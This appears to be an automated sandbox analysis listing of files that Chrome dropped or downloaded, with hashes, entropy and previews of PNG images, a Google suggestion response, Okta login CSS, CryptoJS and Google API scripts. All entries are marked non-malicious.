                                                File Type:PNG image data, 2446 x 899, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):70712
                                                Entropy (8bit):6.94130504124589
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:F70FF06D19498D80B130EC78176FD3FF
                                                SHA1:9D8A3B74C5164FF7AE2C7930B6D7B14707B404FC
                                                SHA-256:DF6DBAB5251E56B405E48AAF57D3CD4188F073FFBA71131FA6CD26E6742923AE
                                                SHA-512:543151693C3751A7E6B1B6A9EA77B83CFD049BC320EE75B666514076F4C0218E9DC23DA5E6C932B2B8670AA1BE1D4E9A91A889F5C6F0D7B9F9C9FE6694609B31
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:.PNG........IHDR................... .IDATx....q......!8.on.....{....4{..{U.A!x...t3P.~.S86...N....7USM....p.".?..>.G....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @.......
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (803)
                                                Category:downloaded
                                                Size (bytes):808
                                                Entropy (8bit):5.174966245741028
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:CF7F5699E9679EE89A7DC6DE07ADBA5B
                                                SHA1:985C3ADA63F5A186F075661A73D35AA71E1468CB
                                                SHA-256:D215F91AF3B91AA3E6A6AB684B1F75F7E010CF70E14BC63573F4D49CA229AC36
                                                SHA-512:028CAFE2E6E707101F82B89196E52D0E70F7056A9E9DD5A6F7E80BD17CBFFD7F2274ED1158BA0B9A410668FE46F4072766DA9BFB7305C6AF048C7D0F61503024
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=7&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                Preview:)]}'.["",["defensive power rankings","greenland tsunami wave","alaska russian aircraft intercept","pokemon go dynamax bands","mega millions jackpot lottery winner","annapurna interactive games","chiefs hollywood brown injury","speak no evil ending explained"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (10450)
                                                Category:downloaded
                                                Size (bytes):10498
                                                Entropy (8bit):5.327380141461276
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:E0D37A504604EF874BAD26435D62011F
                                                SHA1:4301F0D2B729AE22ADECE657D79ECCAA25F429B1
                                                SHA-256:C39FF65E2A102E644EB0BF2E31D2BAD3D18F7AFB25B3B9BA7A4D46263A711179
                                                SHA-512:EF838FD58E0D12596726894AB9418C1FBE31833C187C3323EBFD432970EB1593363513F12114E78E008012CDEF15B504D603AFE4BB10AE5C47674045ACC5221E
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css
                                                Preview:a,abbr,acronym,address,applet,b,big,blockquote,body,caption,center,cite,code,dd,del,dfn,div,dl,dt,em,fieldset,form,h1,h2,h3,h4,h5,h6,html,i,iframe,img,ins,kbd,label,legend,li,object,ol,p,pre,q,s,samp,small,span,strike,strong,sub,sup,table,tbody,td,tfoot,th,thead,tr,tt,u,ul,var{background:transparent;border:0;font-size:100%;font:inherit;margin:0;outline:0;padding:0;vertical-align:baseline}body{line-height:1}ol,ul{list-style:none}blockquote,q{quotes:none}blockquote:after,blockquote:before,q:after,q:before{content:"";content:none}:focus{outline:0}ins{text-decoration:none}del{text-decoration:line-through}table{border-collapse:collapse;border-spacing:0}input[type=hidden]{display:none!important}input[type=checkbox],input[type=radio]{border:0!important;margin:0;padding:0}@font-face{font-family:Proxima Nova;font-style:normal;font-weight:400;src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot);src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot?#iefix) fo
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (48316), with no line terminators
                                                Category:dropped
                                                Size (bytes):48316
                                                Entropy (8bit):5.6346993394709
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:2CA03AD87885AB983541092B87ADB299
                                                SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 1920 x 1080, 8-bit/color RGB, non-interlaced
                                                Category:dropped
                                                Size (bytes):57857
                                                Entropy (8bit):7.884091304883721
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:D293B1B0F1D373DCBFE72B568963EC5E
                                                SHA1:72BDB50D285119CA7B0D2BAA1DC297176CCC8E80
                                                SHA-256:078984BED6EC49A6850DA0A5AC7C927723932C43C5F9FBB4487848F172B3A099
                                                SHA-512:927F6F3E28F7015A72493ECB58FDE60109AEB1F66DAF758F954356EC00784C310592A256651838568885242DCBC0DC8CFEFCED1A8C754703EB0F198A13B78F19
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:.PNG........IHDR.......8.....g.V....xiCCPDisplay..H..WwT...._IBB.M....."M..P...`.I.@..#A..8..c.Q.......*..u.u,.u....:*V........g..w...O......EJ..4...*&9:\...-.<...z0..H\..KJ......#...@..ew.R)..g..i.. ..............`..`7Y.T..Y.L..l....i.....4G..0eR.......'.1y..m..Rq..0...C!.)..`...|.......**...j...<%.o....f.....Dy}../..N..D).M./G..[.\....^>..... n...%....NENB".c..I4s.H^.:&M.'-.%.l.f..!.E.....(.<!^....b...d.L...`.@..D.h9...dm..1...i."....L.....j.)......<../..'.0..!%.)qZ..|aB/.Q'.....d.":\.O..2Q.Z~EQIo...|Yl....O...:&.E.hz..H.ai.:....^$.HM..c."-E..T.'kbi.R....Ryt2.[...)M....*&U...\.*)US']^ .....^.x...... ..(..\gS'..(.. .R.k.....@..RP.....%}q......P.c...vG.D`P.)JP..`P.8.!....P.eK..` ...". F1.(.........0...E....^&;....aG.]h.:.....`:...=i?....|.C.E.}.UV;......*G..j.....r..#.I...t..L.C@...p..i?:....i...Bm.j0_....x.Z..Kr.sC.._G......H....hj.......././A1.fR.....u.j.. ..S....A....0....).(.....'..d E.G......;..L...b..F.....).r. V!.2X.....dfe.4?_/.@. .N.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (2681)
                                                Category:downloaded
                                                Size (bytes):126460
                                                Entropy (8bit):5.4944976484967345
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:1B556C73C5FC0411A5FA9D71277D8F7C
                                                SHA1:190D8E5AD5ADB5976211753197BA4B95935B154B
                                                SHA-256:A79A9AC26A3FACC35971D3ECAA13E2A6B12E666FCBC4AEE6ED857039E81E5E48
                                                SHA-512:D579216F67DC7C0FC5EDEE463892BC6A045866969251A21CE93403908CEC2C9E889250696E983ABDB2D46F7EAECD3F3055C4428838EE47BDD4789A38667A4495
                                                Malicious:false
                                                Reputation:unknown
                                                URL:"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.h-1D-JOvizc.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AABA/rs=AHpOoo_3dbjO7NaEjkPT0PwzLRJUFrcOJQ/cb=gapi.loaded_0"
                                                Preview:gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x400000, ]);.var ba,fa,ha,na,oa,sa,ua,wa;ba=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};fa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.ma=ha(this);na=function(a,b){if(b)a:{var c=_.ma;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&fa(c,a,{configurable:!0,writable:!0,value:b})}};.na("Symbol",function(a){if(a)r
                                                No static file info